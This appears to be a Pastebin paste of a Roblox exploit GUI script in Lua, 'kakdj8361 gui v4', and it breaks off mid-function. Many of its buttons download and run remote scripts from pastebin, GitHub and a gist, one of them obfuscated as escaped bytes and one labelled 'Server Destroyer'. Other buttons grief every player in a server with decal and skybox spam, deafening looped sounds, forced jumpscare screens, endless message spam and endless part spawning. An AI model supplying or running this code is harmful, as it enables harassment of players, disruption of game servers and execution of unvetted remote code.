Advertisement
Guest User

kakdj8361 gui v4

a guest
Sep 26th, 2024
625
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 30.24 KB | None | 0 0
  1. -- Gui to Lua
  2. -- Version: 3.2
  3.  
  4. -- Instances:
  5.  
  6. local ScreenGui = Instance.new("ScreenGui")
  7. local Frame = Instance.new("Frame")
  8. local TextLabel = Instance.new("TextLabel")
  9. local TextLabel3 = Instance.new("TextLabel")
  10. local TextLabel2 = Instance.new("TextLabel")
  11. local R6 = Instance.new("TextButton")
  12. local Stop = Instance.new("TextButton")
  13. local ADMIN = Instance.new("TextButton")
  14. local Decal1 = Instance.new("TextButton")
  15. local Music = Instance.new("TextButton")
  16. local ADMIN2 = Instance.new("TextButton")
  17. local Decal2 = Instance.new("TextButton")
  18. local Music2 = Instance.new("TextButton")
  19. local ADMIN3 = Instance.new("TextButton")
  20. local Decal3 = Instance.new("TextButton")
  21. local Music3 = Instance.new("TextButton")
  22. local ADMIN4 = Instance.new("TextButton")
  23. local Decal4 = Instance.new("TextButton")
  24. local Music4 = Instance.new("TextButton")
  25. local TOADROAD = Instance.new("TextButton")
  26. local JUMPSCARE = Instance.new("TextButton")
  27. local SKYSPAMMING = Instance.new("TextButton")
  28. local MESSAGE = Instance.new("TextButton")
  29. local SKYK00P = Instance.new("TextButton")
  30. local ANTILEAVE = Instance.new("TextButton")
  31. local SKYC00L = Instance.new("TextButton")
  32.  
  33. --Properties:
  34.  
  35. ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  36. ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  37. ScreenGui.Parent = game.CoreGui
  38.  
  39. Frame.Parent = ScreenGui
  40. Frame.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
  41. Frame.BorderColor3 = Color3.fromRGB(255, 0, 0)
  42. Frame.BorderSizePixel = 5
  43. Frame.Position = UDim2.new(0, 0, 0, 0)
  44. Frame.Size = UDim2.new(0, 400, 0, 500)
  45.  
  46. TextLabel.Parent = Frame
  47. TextLabel.BackgroundColor3 = Color3.fromRGB(200,0,0)
  48. TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
  49. TextLabel.BorderSizePixel = 2
  50. TextLabel.Position = UDim2.new(0.30, 0, 0, 0)
  51. TextLabel.Size = UDim2.new(0, 150, 0, 40)
  52. TextLabel.Font = Enum.Font.Cartoon
  53. TextLabel.Text = "kakdj8361 v4"
  54. TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
  55. TextLabel.TextScaled = true
  56. TextLabel.TextSize = 500
  57. TextLabel.TextWrapped = true
  58.  
  59. TextLabel3.Parent = Frame
  60. TextLabel3.BackgroundColor3 = Color3.fromRGB(200,0,0)
  61. TextLabel3.BorderColor3 = Color3.fromRGB(0, 0, 0)
  62. TextLabel3.BorderSizePixel = 2
  63. TextLabel3.BackgroundTransparency = 1
  64. TextLabel3.Position = UDim2.new(0.30, 0, 0.133, 0)
  65. TextLabel3.Size = UDim2.new(0, 150, 0, 30)
  66. TextLabel3.Font = Enum.Font.Cartoon
  67. TextLabel3.Text = "(gui by souhi14alt)"
  68. TextLabel3.TextColor3 = Color3.fromRGB(0, 0, 0)
  69. TextLabel3.TextScaled = true
  70. TextLabel3.TextSize = 500
  71. TextLabel3.TextWrapped = true
  72.  
  73. TextLabel2.Parent = Frame
  74. TextLabel2.BackgroundColor3 = Color3.fromRGB(0,250,0)
  75. TextLabel2.BorderColor3 = Color3.fromRGB(0, 0, 0)
  76. TextLabel2.BorderSizePixel = 2
  77. TextLabel2.Position = UDim2.new(0, 0, 0.9, 0)
  78. TextLabel2.Size = UDim2.new(0, 400, 0, 60)
  79. TextLabel2.Font = Enum.Font.Cartoon
  80. TextLabel2.Text = "[kakdj8381 no top !!!]"
  81. TextLabel2.TextColor3 = Color3.fromRGB(0, 0, 0)
  82. TextLabel2.TextScaled = true
  83. TextLabel2.TextSize = 100
  84. TextLabel2.TextWrapped = true
  85.  
  86. R6.Parent = Frame
  87. R6.BackgroundColor3 = Color3.fromRGB(200,0,0)
  88. R6.BorderColor3 = Color3.fromRGB(0, 0, 0)
  89. R6.BorderSizePixel = 2
  90. R6.Position = UDim2.new(0.02, 0, 0.07, 0)
  91. R6.Size = UDim2.new(0, 80, 0, 37)
  92. R6.Font = Enum.Font.Cartoon
  93. R6.Text = "R6"
  94. R6.TextColor3 = Color3.fromRGB(0, 0, 0)
  95. R6.TextScaled = true
  96. R6.TextSize = 500
  97. R6.TextWrapped = true
  98. R6.MouseButton1Down:connect(function()
  99. loadstring(game:HttpGet("https://pastebin.com/raw/e2GzxYjD"))()
  100. end)
  101. Stop.Parent = Frame
  102. Stop.BackgroundColor3 = Color3.fromRGB(200,0,0)
  103. Stop.BorderColor3 = Color3.fromRGB(0, 0, 0)
  104. Stop.BorderSizePixel = 2
  105. Stop.Position = UDim2.new(0.76, 0, 0.07, 0)
  106. Stop.Size = UDim2.new(0, 76, 0, 37)
  107. Stop.Font = Enum.Font.Cartoon
  108. Stop.Text = "Stop All Sound"
  109. Stop.TextColor3 = Color3.fromRGB(0, 0, 0)
  110. Stop.TextScaled = true
  111. Stop.TextSize = 500
  112. Stop.TextWrapped = true
  113. Stop.MouseButton1Down:connect(function()
  114. for i,v in pairs(workspace:GetDescendants()) do
  115. if v:IsA("Sound") then
  116. v.Playing = false
  117. end
  118. end
  119. end)
  120. ADMIN.Parent = Frame
  121. ADMIN.BackgroundColor3 = Color3.fromRGB(200,0,0)
  122. ADMIN.BorderColor3 = Color3.fromRGB(0, 0, 0)
  123. ADMIN.BorderSizePixel = 2
  124. ADMIN.Position = UDim2.new(0, 0, 0.25, 0)
  125. ADMIN.Size = UDim2.new(0, 110, 0, 40)
  126. ADMIN.Font = Enum.Font.Cartoon
  127. ADMIN.Text = "Decal 1"
  128. ADMIN.TextColor3 = Color3.fromRGB(0, 0, 0)
  129. ADMIN.TextScaled = true
  130. ADMIN.TextSize = 500
  131. ADMIN.TextWrapped = true
  132. ADMIN.MouseButton1Down:connect(function()
  133. s = Instance.new("Sky")
  134. s.Name = "Skybox"
  135. s.SkyboxBk = "http://www.roblox.com/asset/?id=18991331074"
  136. s.SkyboxDn = "http://www.roblox.com/asset/?id=18991331074"
  137. s.SkyboxFt = "http://www.roblox.com/asset/?id=18991331074"
  138. s.SkyboxLf = "http://www.roblox.com/asset/?id=18991331074"
  139. s.SkyboxRt = "http://www.roblox.com/asset/?id=18991331074"
  140. s.SkyboxUp = "http://www.roblox.com/asset/?id=18991331074"
  141. s.Parent = game.Lighting
  142. local ID = 18991331074
  143. function spamDecal(v)
  144. if v:IsA("Part") then
  145. for i = 0, 5 do
  146. D = Instance.new("Decal")
  147. D.Name = "k00pz"
  148. D.Face = i
  149. D.Parent = v
  150. D.Texture = ("http://www.roblox.com/asset/?id="..Id)
  151. end
  152. else
  153. if v:IsA("Model") then
  154. for a,b in pairs(v:GetChildren()) do
  155. spamDecal(b)
  156. end
  157. end
  158. end
  159. end
  160. function decalspam(id)
  161. Id = id
  162. for i,v in pairs(game.Workspace:GetChildren()) do
  163. if v:IsA("Part") then
  164. for i = 0, 5 do
  165. D = Instance.new("Decal")
  166. D.Name = "k00pz"
  167. D.Face = i
  168. D.Parent = v
  169. D.Texture = ("http://www.roblox.com/asset/?id="..id)
  170. end
  171. else
  172. if v:IsA("Model") then
  173. for a,b in pairs(v:GetChildren()) do
  174. spamDecal(b)
  175. end
  176. end
  177. end
  178. end
  179. end
  180. decalspam(ID)
  181. end)
  182. Decal1.Parent = Frame
  183. Decal1.BackgroundColor3 = Color3.fromRGB(200,0,0)
  184. Decal1.BorderColor3 = Color3.fromRGB(0, 0, 0)
  185. Decal1.BorderSizePixel = 2
  186. Decal1.Position = UDim2.new(0.34, 0, 0.25, 0)
  187. Decal1.Size = UDim2.new(0, 110, 0, 40)
  188. Decal1.Font = Enum.Font.Cartoon
  189. Decal1.Text = "Particles 1"
  190. Decal1.TextColor3 = Color3.fromRGB(0, 0, 0)
  191. Decal1.TextScaled = true
  192. Decal1.TextSize = 500
  193. Decal1.TextWrapped = true
  194. Decal1.MouseButton1Down:connect(function()
  195. local playerLeaderstats = {}
  196. for i, v in pairs(game.Players:GetChildren()) do
  197. table.insert(playerLeaderstats, v)
  198. end
  199. for i, v in pairs(playerLeaderstats) do
  200. pe = Instance.new("ParticleEmitter",v.Character.Torso)
  201. pe.Texture = "http://www.roblox.com/asset/?id=18991331074"
  202. pe.VelocitySpread = 66
  203. end
  204. end)
  205. Music.Parent = Frame
  206. Music.BackgroundColor3 = Color3.fromRGB(200,0,0)
  207. Music.BorderColor3 = Color3.fromRGB(0, 0, 0)
  208. Music.BorderSizePixel = 2
  209. Music.Position = UDim2.new(0.67, 0, 0.25, 0)
  210. Music.Size = UDim2.new(0, 110, 0, 40)
  211. Music.Font = Enum.Font.Cartoon
  212. Music.Text = "Music"
  213. Music.TextColor3 = Color3.fromRGB(0, 0, 0)
  214. Music.TextScaled = true
  215. Music.TextSize = 500
  216. Music.TextWrapped = true
  217. Music.MouseButton1Down:connect(function()
  218. Spooky = Instance.new("Sound", game.Workspace)
  219. Spooky.Name = "Spooky"
  220. Spooky.SoundId = "rbxassetid://1847661821"
  221. Spooky.Volume = 6e9
  222. Spooky.Looped = true
  223. Spooky:Play()
  224. end)
  225. ADMIN2.Parent = Frame
  226. ADMIN2.BackgroundColor3 = Color3.fromRGB(200,0,0)
  227. ADMIN2.BorderColor3 = Color3.fromRGB(0, 0, 0)
  228. ADMIN2.BorderSizePixel = 2
  229. ADMIN2.Position = UDim2.new(0, 0, 0.40, 0)
  230. ADMIN2.Size = UDim2.new(0, 110, 0, 40)
  231. ADMIN2.Font = Enum.Font.Cartoon
  232. ADMIN2.Text = "Decal 2"
  233. ADMIN2.TextColor3 = Color3.fromRGB(0, 0, 0)
  234. ADMIN2.TextScaled = true
  235. ADMIN2.TextSize = 500
  236. ADMIN2.TextWrapped = true
  237. ADMIN2.MouseButton1Down:connect(function()
  238. s.Name = "Skybox"
  239. s.SkyboxBk = "http://www.roblox.com/asset/?id=95218838446416"
  240. s.SkyboxDn = "http://www.roblox.com/asset/?id=95218838446416"
  241. s.SkyboxFt = "http://www.roblox.com/asset/?id=95218838446416"
  242. s.SkyboxLf = "http://www.roblox.com/asset/?id=95218838446416"
  243. s.SkyboxRt = "http://www.roblox.com/asset/?id=95218838446416"
  244. s.SkyboxUp = "http://www.roblox.com/asset/?id=95218838446416"
  245. s.Parent = game.Lighting
  246. local ID = 95218838446416
  247. function spamDecal(v)
  248. if v:IsA("Part") then
  249. for i = 0, 5 do
  250. D = Instance.new("Decal")
  251. D.Name = "k00pz"
  252. D.Face = i
  253. D.Parent = v
  254. D.Texture = ("http://www.roblox.com/asset/?id="..Id)
  255. end
  256. else
  257. if v:IsA("Model") then
  258. for a,b in pairs(v:GetChildren()) do
  259. spamDecal(b)
  260. end
  261. end
  262. end
  263. end
  264. function decalspam(id)
  265. Id = id
  266. for i,v in pairs(game.Workspace:GetChildren()) do
  267. if v:IsA("Part") then
  268. for i = 0, 5 do
  269. D = Instance.new("Decal")
  270. D.Name = "k00pz"
  271. D.Face = i
  272. D.Parent = v
  273. D.Texture = ("http://www.roblox.com/asset/?id="..id)
  274. end
  275. else
  276. if v:IsA("Model") then
  277. for a,b in pairs(v:GetChildren()) do
  278. spamDecal(b)
  279. end
  280. end
  281. end
  282. end
  283. end
  284. decalspam(ID)
  285. end)
  286. Decal2.Parent = Frame
  287. Decal2.BackgroundColor3 = Color3.fromRGB(200,0,0)
  288. Decal2.BorderColor3 = Color3.fromRGB(0, 0, 0)
  289. Decal2.BorderSizePixel = 2
  290. Decal2.Position = UDim2.new(0.34, 0, 0.40, 0)
  291. Decal2.Size = UDim2.new(0, 110, 0, 40)
  292. Decal2.Font = Enum.Font.Cartoon
  293. Decal2.Text = "Particles 2"
  294. Decal2.TextColor3 = Color3.fromRGB(0, 0, 0)
  295. Decal2.TextScaled = true
  296. Decal2.TextSize = 500
  297. Decal2.TextWrapped = true
  298. Decal2.MouseButton1Down:connect(function()
  299. local playerLeaderstats = {}
  300. for i, v in pairs(game.Players:GetChildren()) do
  301. table.insert(playerLeaderstats, v)
  302. end
  303. for i, v in pairs(playerLeaderstats) do
  304. pe = Instance.new("ParticleEmitter",v.Character.Torso)
  305. pe.Texture = "http://www.roblox.com/asset/?id=117215940450054"
  306. pe.VelocitySpread = 2437565764426765344562347564245762445765754247562444576244765442545372467557643754637564365347563475643765435764377653475643
  307. end
  308. end)
  309. Music2.Parent = Frame
  310. Music2.BackgroundColor3 = Color3.fromRGB(200,0,0)
  311. Music2.BorderColor3 = Color3.fromRGB(0, 0, 0)
  312. Music2.BorderSizePixel = 2
  313. Music2.Position = UDim2.new(0.67, 0, 0.40, 0)
  314. Music2.Size = UDim2.new(0, 110, 0, 40)
  315. Music2.Font = Enum.Font.Cartoon
  316. Music2.Text = "Shutdown"
  317. Music2.TextColor3 = Color3.fromRGB(0, 0, 0)
  318. Music2.TextScaled = true
  319. Music2.TextSize = 500
  320. Music2.TextWrapped = true
  321. Music2.MouseButton1Down:connect(function()
  322. Music2.Text = "ERROR"
  323. wait(0.8)
  324. Music2.Text = "Cannot bypass the [byfron]"
  325. wait(0.6)
  326. Music2.Text = "Try Again Later"
  327. wait(0.6)
  328. Music2.Text = "Shutdown"
  329. end)
  330. ADMIN3.Parent = Frame
  331. ADMIN3.BackgroundColor3 = Color3.fromRGB(200,0,0)
  332. ADMIN3.BorderColor3 = Color3.fromRGB(0, 0, 0)
  333. ADMIN3.BorderSizePixel = 2
  334. ADMIN3.Position = UDim2.new(0, 0, 0.57, 0)
  335. ADMIN3.Size = UDim2.new(0, 110, 0, 40)
  336. ADMIN3.Font = Enum.Font.Cartoon
  337. ADMIN3.Text = "m00rgui v120"
  338. ADMIN3.TextColor3 = Color3.fromRGB(0, 0, 0)
  339. ADMIN3.TextScaled = true
  340. ADMIN3.TextSize = 500
  341. ADMIN3.TextWrapped = true
  342. ADMIN3.MouseButton1Down:connect(function()
  343. loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\89\114\105\104\97\115\47\109\48\48\114\107\105\100\100\45\118\49\50\48\45\118\50\47\109\97\105\110\47\109\48\48\114\107\105\100\100\37\50\48\118\49\50\48\37\50\48\118\50\37\50\48\109\97\105\110\34\41\41\40\41\10")()
  344. end)
  345. Decal3.Parent = Frame
  346. Decal3.BackgroundColor3 = Color3.fromRGB(200,0,0)
  347. Decal3.BorderColor3 = Color3.fromRGB(0, 0, 0)
  348. Decal3.BorderSizePixel = 2
  349. Decal3.Position = UDim2.new(0.34, 0, 0.57, 0)
  350. Decal3.Size = UDim2.new(0, 110, 0, 40)
  351. Decal3.Font = Enum.Font.Cartoon
  352. Decal3.Text = "Rogui"
  353. Decal3.TextColor3 = Color3.fromRGB(0, 0, 0)
  354. Decal3.TextScaled = true
  355. Decal3.TextSize = 500
  356. Decal3.TextWrapped = true
  357. Decal3.MouseButton1Down:connect(function()
  358. loadstring(game:HttpGet("https://raw.githubusercontent.com/RetroGamesAlt/Guimain/main/Gui"))()
  359. end)
  360. Music3.Parent = Frame
  361. Music3.BackgroundColor3 = Color3.fromRGB(200,0,0)
  362. Music3.BorderColor3 = Color3.fromRGB(0, 0, 0)
  363. Music3.BorderSizePixel = 2
  364. Music3.Position = UDim2.new(0.67, 0, 0.57, 0)
  365. Music3.Size = UDim2.new(0, 110, 0, 40)
  366. Music3.Font = Enum.Font.Cartoon
  367. Music3.Text = "Server Destroyer"
  368. Music3.TextColor3 = Color3.fromRGB(0, 0, 0)
  369. Music3.TextScaled = true
  370. Music3.TextSize = 500
  371. Music3.TextWrapped = true
  372. Music3.MouseButton1Down:connect(function()
  373. loadstring(game:HttpGet("https://raw.githubusercontent.com/CoreGui/Scripts/main/RC7"))()
  374. end)
  375. ADMIN4.Parent = Frame
  376. ADMIN4.BackgroundColor3 = Color3.fromRGB(200,0,0)
  377. ADMIN4.BorderColor3 = Color3.fromRGB(0, 0, 0)
  378. ADMIN4.BorderSizePixel = 2
  379. ADMIN4.Position = UDim2.new(0, 0, 0.73, 0)
  380. ADMIN4.Size = UDim2.new(0, 110, 0, 40)
  381. ADMIN4.Font = Enum.Font.Cartoon
  382. ADMIN4.Text = "Map 1"
  383. ADMIN4.TextColor3 = Color3.fromRGB(0, 0, 0)
  384. ADMIN4.TextScaled = true
  385. ADMIN4.TextSize = 500
  386. ADMIN4.TextWrapped = true
  387. ADMIN4.MouseButton1Down:connect(function()
  388. game:GetService("TeleportService"):Teleport(17828363252)
  389. end)
  390. Decal4.Parent = Frame
  391. Decal4.BackgroundColor3 = Color3.fromRGB(200,0,0)
  392. Decal4.BorderColor3 = Color3.fromRGB(0, 0, 0)
  393. Decal4.BorderSizePixel = 2
  394. Decal4.Position = UDim2.new(0.34, 0, 0.73, 0)
  395. Decal4.Size = UDim2.new(0, 110, 0, 40)
  396. Decal4.Font = Enum.Font.Cartoon
  397. Decal4.Text = "c00lgui v23"
  398. Decal4.TextColor3 = Color3.fromRGB(0, 0, 0)
  399. Decal4.TextScaled = true
  400. Decal4.TextSize = 500
  401. Decal4.TextWrapped = true
  402. Decal4.MouseButton1Down:connect(function()
  403. loadstring(game:HttpGet("https://gist.githubusercontent.com/jointeamck/73dcc467e32521790a2f97683d50a642/raw/d168a75fb8e9465a55c17abefd9f218bc3e5e3cd/c00lgui", true))()
  404. end)
  405. Music4.Parent = Frame
  406. Music4.BackgroundColor3 = Color3.fromRGB(200,0,0)
  407. Music4.BorderColor3 = Color3.fromRGB(0, 0, 0)
  408. Music4.BorderSizePixel = 2
  409. Music4.Position = UDim2.new(0.67, 0, 0.73, 0)
  410. Music4.Size = UDim2.new(0, 110, 0, 40)
  411. Music4.Font = Enum.Font.Cartoon
  412. Music4.Text = "Disc01!1!"
  413. Music4.TextColor3 = Color3.fromRGB(0, 0, 0)
  414. Music4.TextScaled = true
  415. Music4.TextSize = 500
  416. Music4.TextWrapped = true
  417. Music4.MouseButton1Down:connect(function()
  418. local Lighting = game:GetService("Lighting")
  419. local ColorCorrection = Instance.new("ColorCorrectionEffect", Lighting)
  420.  
  421. function zigzag(X)
  422. return math.acos(math.cos(X*math.pi))/math.pi
  423. end
  424.  
  425. Counter = 0
  426.  
  427. while wait(0.1) do
  428. ColorCorrection.TintColor = Color3.fromHSV(zigzag(Counter),1,1)
  429. Lighting.Ambient = Color3.fromHSV(zigzag(Counter),1,1)
  430. Counter += 0.01
  431. end
  432. end)
  433. TOADROAD.Parent = Frame
  434. TOADROAD.BackgroundColor3 = Color3.fromRGB(200,0,0)
  435. TOADROAD.BorderColor3 = Color3.fromRGB(0, 0, 0)
  436. TOADROAD.BorderSizePixel = 2
  437. TOADROAD.Position = UDim2.new(1, 0, 0, 0)
  438. TOADROAD.Size = UDim2.new(0, 170, 0, 35)
  439. TOADROAD.Font = Enum.Font.Cartoon
  440. TOADROAD.Text = "Toadroast"
  441. TOADROAD.TextColor3 = Color3.fromRGB(0, 0, 0)
  442. TOADROAD.TextScaled = true
  443. TOADROAD.TextSize = 500
  444. TOADROAD.TextWrapped = true
  445. TOADROAD.MouseButton1Down:connect(function()
  446. loadstring(game:HttpGet("https://pastebin.com/raw/DXMLqYme"))()
  447. end)
  448. JUMPSCARE.Parent = Frame
  449. JUMPSCARE.BackgroundColor3 = Color3.fromRGB(200,0,0)
  450. JUMPSCARE.BorderColor3 = Color3.fromRGB(0, 0, 0)
  451. JUMPSCARE.BorderSizePixel = 2
  452. JUMPSCARE.Position = UDim2.new(1, 0, 0.15, 0)
  453. JUMPSCARE.Size = UDim2.new(0, 170, 0, 35)
  454. JUMPSCARE.Font = Enum.Font.Cartoon
  455. JUMPSCARE.Text = "Jumpscare"
  456. JUMPSCARE.TextColor3 = Color3.fromRGB(0, 0, 0)
  457. JUMPSCARE.TextScaled = true
  458. JUMPSCARE.TextSize = 500
  459. JUMPSCARE.TextWrapped = true
  460. JUMPSCARE.MouseButton1Down:connect(function()
  461. for i,v in pairs(game.Players:GetPlayers()) do
  462. if v.Name ~= me and not v.PlayerGui:FindFirstChild("k00pkidd's Jumpscare") and v:FindFirstChild("PlayerGui") then
  463. spawn(function()
  464. local newgui = Instance.new("ScreenGui",v.PlayerGui)
  465. newgui.Name = "k00p's Jumpscare"
  466. local newimage = Instance.new("ImageLabel",newgui)
  467. newimage.Image = "rbxassetid://124894773271887"
  468. newimage.Size = UDim2.new(0,800,0,345)
  469.  
  470. newimage.BackgroundTransparency = 1
  471. local m = Instance.new("Hint", game.workspace)
  472. m.Text = "KAKD ON TOP"
  473. s = Instance.new("Sound",newgui)
  474. s.SoundId = "rbxassetid://8683380188"
  475. s.Volume = 9e9
  476. s.Looped = true
  477. s:Play()
  478. print("Screamed "..v.Name)
  479. while wait(9) do
  480.  
  481. newimage.Parent:Destroy()
  482.  
  483. end
  484. end)
  485. end
  486. end
  487. end)
  488. SKYSPAMMING.Parent = Frame
  489. SKYSPAMMING.BackgroundColor3 = Color3.fromRGB(200,0,0)
  490. SKYSPAMMING.BorderColor3 = Color3.fromRGB(0, 0, 0)
  491. SKYSPAMMING.BorderSizePixel = 2
  492. SKYSPAMMING.Position = UDim2.new(-0.43, 0, 0, 0)
  493. SKYSPAMMING.Size = UDim2.new(0, 170, 0, 35)
  494. SKYSPAMMING.Font = Enum.Font.Cartoon
  495. SKYSPAMMING.Text = "Skybox Spam"
  496. SKYSPAMMING.TextColor3 = Color3.fromRGB(0, 0, 0)
  497. SKYSPAMMING.TextScaled = true
  498. SKYSPAMMING.TextSize = 500
  499. SKYSPAMMING.TextWrapped = true
  500. SKYSPAMMING.MouseButton1Down:connect(function()
  501. s = Instance.new("Sky")
  502. s.Name = "SKY"
  503. s.SkyboxBk = "rbxassetid://124894773271887"
  504. s.SkyboxDn = "rbxassetid://124894773271887"
  505. s.SkyboxFt = "rbxassetid://124894773271887"
  506. s.SkyboxLf = "rbxassetid://124894773271887"
  507. s.SkyboxRt = "rbxassetid://124894773271887"
  508. s.SkyboxUp = "rbxassetid://124894773271887"
  509. s.Parent = game.Lighting
  510. wait()
  511. end)
  512. MESSAGE.Parent = Frame
  513. MESSAGE.BackgroundColor3 = Color3.fromRGB(200,0,0)
  514. MESSAGE.BorderColor3 = Color3.fromRGB(0, 0, 0)
  515. MESSAGE.BorderSizePixel = 2
  516. MESSAGE.Position = UDim2.new(-0.43, 0, 0.20, 0)
  517. MESSAGE.Size = UDim2.new(0, 170, 0, 35)
  518. MESSAGE.Font = Enum.Font.Cartoon
  519. MESSAGE.Text = "Message Spam"
  520. MESSAGE.TextColor3 = Color3.fromRGB(0, 0, 0)
  521. MESSAGE.TextScaled = true
  522. MESSAGE.TextSize = 500
  523. MESSAGE.TextWrapped = true
  524. MESSAGE.MouseButton1Down:connect(function()
  525. while wait(0.4) do
  526. msg = Instance.new("Message",workspace)
  527. msg.Text = "LOL KAKDJ8361 ON TOP AND SOUHI14ALT"
  528. wait(0.4)
  529. msg:Destroy()
  530. end
  531. end)
  532. SKYK00P.Parent = Frame
  533. SKYK00P.BackgroundColor3 = Color3.fromRGB(200,0,0)
  534. SKYK00P.BorderColor3 = Color3.fromRGB(0, 0, 0)
  535. SKYK00P.BorderSizePixel = 2
  536. SKYK00P.Position = UDim2.new(-0.43, 0, 0.35, 0)
  537. SKYK00P.Size = UDim2.new(0, 170, 0, 35)
  538. SKYK00P.Font = Enum.Font.Cartoon
  539. SKYK00P.Text = "k00pkidd sky"
  540. SKYK00P.TextColor3 = Color3.fromRGB(0, 0, 0)
  541. SKYK00P.TextScaled = true
  542. SKYK00P.TextSize = 500
  543. SKYK00P.TextWrapped = true
  544. SKYK00P.MouseButton1Down:connect(function()
  545. s = Instance.new("Sky")
  546. s.Name = "SKY"
  547. s.SkyboxBk = "rbxassetid://15777427232"
  548. s.SkyboxDn = "rbxassetid://15777427232"
  549. s.SkyboxFt = "rbxassetid://15777427232"
  550. s.SkyboxLf = "rbxassetid://15777427232"
  551. s.SkyboxRt = "rbxassetid://15777427232"
  552. s.SkyboxUp = "rbxassetid://15777427232"
  553. s.Parent = game.Lighting
  554. wait()
  555. end)
  556. ANTILEAVE.Parent = Frame
  557. ANTILEAVE.BackgroundColor3 = Color3.fromRGB(200,0,0)
  558. ANTILEAVE.BorderColor3 = Color3.fromRGB(0, 0, 0)
  559. ANTILEAVE.BorderSizePixel = 2
  560. ANTILEAVE.Position = UDim2.new(-0.43, 0, 0.50, 0)
  561. ANTILEAVE.Size = UDim2.new(0, 170, 0, 35)
  562. ANTILEAVE.Font = Enum.Font.Cartoon
  563. ANTILEAVE.Text = "balls"
  564. ANTILEAVE.TextColor3 = Color3.fromRGB(0, 0, 0)
  565. ANTILEAVE.TextScaled = true
  566. ANTILEAVE.TextSize = 500
  567. ANTILEAVE.TextWrapped = true
  568. ANTILEAVE.MouseButton1Down:connect(function()
  569. script.Parent.MouseButton1Click:Connect(function()
  570. while true do
  571. communism=math.random(0,3)
  572. crex=math.random(3,100)
  573. obesity=math.random(-500, 500)
  574. positivity=math.random(100, 600)
  575. IEndorseThese=math.random(-500, 500)
  576. wait()
  577. doom=Instance.new("Part")
  578. local imnotfat = math.random(1, 3)
  579. if imnotfat == 1 then
  580. doom.Shape = "Ball"
  581. else if imnotfat == 2 then
  582. doom.Shape = "Cylinder"
  583. else
  584. end end
  585. doom.Material = "Neon"
  586. doom.Size = Vector3.new(crex, crex, crex)
  587. doom.Position = Vector3.new(obesity, positivity, IEndorseThese)
  588. doom.Color = Color3.new(math.random(), math.random(), math.random())
  589. doom.Velocity=Vector3.new(communism, communism, communism)
  590. doom.Parent = game.Workspace
  591. yooka=math.random(-200, -50)
  592. doom=Instance.new("Part")
  593. doom.Shape = "Ball"
  594. doom.Size = Vector3.new(crex, crex, crex)
  595. doom.Position = Vector3.new(obesity, yooka, IEndorseThese)
  596. doom.Color = Color3.new(math.random(), math.random(), math.random())
  597. doom.Velocity=Vector3.new(communism, 800, communism)
  598. doom.Parent = game.Workspace
  599. communism=math.random(0,3)
  600. crex=math.random(3,100)
  601. obesity=math.random(-500, 500)
  602. positivity=math.random(100, 600)
  603. IEndorseThese=math.random(-500, 500)
  604. doom=Instance.new("Part")
  605. doom.Shape = "Ball"
  606. doom.Size = Vector3.new(crex, crex, crex)
  607. doom.Position = Vector3.new(obesity, positivity, IEndorseThese)
  608. doom.Color = Color3.new(math.random(), math.random(), math.random())
  609. doom.Velocity=Vector3.new(communism, communism, communism)
  610. doom.Parent = game.Workspace
  611. communism=math.random(0,3)
  612. crex=math.random(3,100)
  613. obesity=math.random(-500, 500)
  614. positivity=math.random(100, 600)
  615. IEndorseThese=math.random(-500, 500)
  616. doom=Instance.new("Part")
  617. doom.Shape = "Ball"
  618. doom.Size = Vector3.new(crex, crex, crex)
  619. doom.Position = Vector3.new(obesity, positivity, IEndorseThese)
  620. doom.Color = Color3.new(math.random(), math.random(), math.random())
  621. doom.Velocity=Vector3.new(communism, communism, communism)
  622. doom.Parent = game.Workspace
  623. communism=math.random(0,3)
  624. crex=math.random(3,100)
  625. obesity=math.random(-500, 500)
  626. positivity=math.random(100, 600)
  627. IEndorseThese=math.random(-500, 500)
  628. doom=Instance.new("Part")
  629. doom.Shape = "Ball"
  630. doom.Size = Vector3.new(crex, crex, crex)
  631. doom.Position = Vector3.new(obesity, positivity, IEndorseThese)
  632. doom.Color = Color3.new(math.random(), math.random(), math.random())
  633. doom.Velocity=Vector3.new(communism, communism, communism)
  634. doom.Parent = game.Workspace
  635. end
  636. end)
  637. wait()
  638. end)
  639. SKYC00L.Parent = Frame
  640. SKYC00L.BackgroundColor3 = Color3.fromRGB(200,0,0)
  641. SKYC00L.BorderColor3 = Color3.fromRGB(0, 0, 0)
  642. SKYC00L.BorderSizePixel = 2
  643. SKYC00L.Position = UDim2.new(-0.43, 0, 0.65, 0)
  644. SKYC00L.Size = UDim2.new(0, 170, 0, 35)
  645. SKYC00L.Font = Enum.Font.Cartoon
  646. SKYC00L.Text = "souhi14 sky"
  647. SKYC00L.TextColor3 = Color3.fromRGB(0, 0, 0)
  648. SKYC00L.TextScaled = true
  649. SKYC00L.TextSize = 500
  650. SKYC00L.TextWrapped = true
  651. SKYC00L.MouseButton1Down:connect(function()
  652. s = Instance.new("Sky")
  653. s.Name = "SKY"
  654. s.SkyboxBk = "rbxassetid://107833534095342"
  655. s.SkyboxDn = "rbxassetid://107833534095342"
  656. s.SkyboxFt = "rbxassetid://107833534095342"
  657. s.SkyboxLf = "rbxassetid://107833534095342"
  658. s.SkyboxRt = "rbxassetid://107833534095342"
  659. s.SkyboxUp = "rbxassetid://107833534095342"
  660. s.Parent = game.Lighting
  661. wait()
  662. end)
  663. -- Scripts :
  664.  
  665. local function QFCS_fake_script() -- Frame.Dragify
  666. local script = Instance.new('LocalScript', Frame)
  667.  
  668. local UIS = game:GetService("UserInputService")
  669. function dragify(Frame)
  670. dragToggle = nil
  671. local dragSpeed = 0
  672. dragInput = nil
  673. dragStart = nil
  674. local dragPos = nil
  675. function updateInput(input)
  676. local Delta = input.Position - dragStart
  677. local Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + Delta.X, startPos.Y.Scale, startPos.Y.Offset + Delta.Y)
  678. game:GetService("TweenService"):Create(Frame, TweenInfo.new(0.25), {Position = Position}):Play()
  679. end
  680. Frame.InputBegan:Connect(function(input)
